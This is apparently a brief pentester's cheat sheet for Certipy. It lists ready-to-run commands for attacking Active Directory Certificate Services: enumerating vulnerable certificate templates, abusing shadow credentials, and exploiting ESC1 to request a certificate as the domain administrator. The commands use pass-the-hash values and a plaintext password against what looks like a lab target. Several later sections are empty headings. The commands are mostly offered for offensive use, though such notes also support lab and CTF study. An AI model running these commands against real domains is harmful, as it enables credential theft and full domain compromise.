certipy

Find Vulnerable Template

  • Find vulnerable template

certipy find -u 'user' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce'  -dc-ip 10.10.11.51  
certipy find -u '[email protected]' -p <password> -dc-ip <DC_IP> -vulnerable -enabled
certipy find -u '[email protected]' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce'  -dc-ip 10.10.11.51   

Shadow Credential

  • Get Shadow credentials

certipy-ad shadow auto -u '[email protected]' -p "WqSZAF6CysDQbGb3" -account 'user_2' -dc-ip '10.10.11.51' 

ESC1

  • Exploit ESC1

certipy-ad req -u user -target domain.local -upn [email protected] -ca sequel-DC01-CA -template template_name -hashes 3b181b914e7a9d5508ea1e20bc2b7fce:3b181b914e7a9d5508ea1e20bc2b7fce -key-size 4096  -dns 10.10.11.51 -dc-ip 10.10.11.51
certipy-ad req -u user -target domain.local -web -port 80 -subject 'DIstinguishedName' -sid 'SID -debug' -ca sequel-DC01-CA -template template_name -target-ip <ip_ca>

ESC4

  • Exploit ESC4

Using PFXS withou password

  • Certipy's commands don't support PFXs with password. The following command can be used to "unprotect" a PFX file.

Auth using pfx

Bloodhound

Risorse

  • https://www.thehacker.recipes/ad/movement/kerberos/pass-the-certificate

  • https://github.com/ly4k/Certipy/blob/main/README.md

Last updated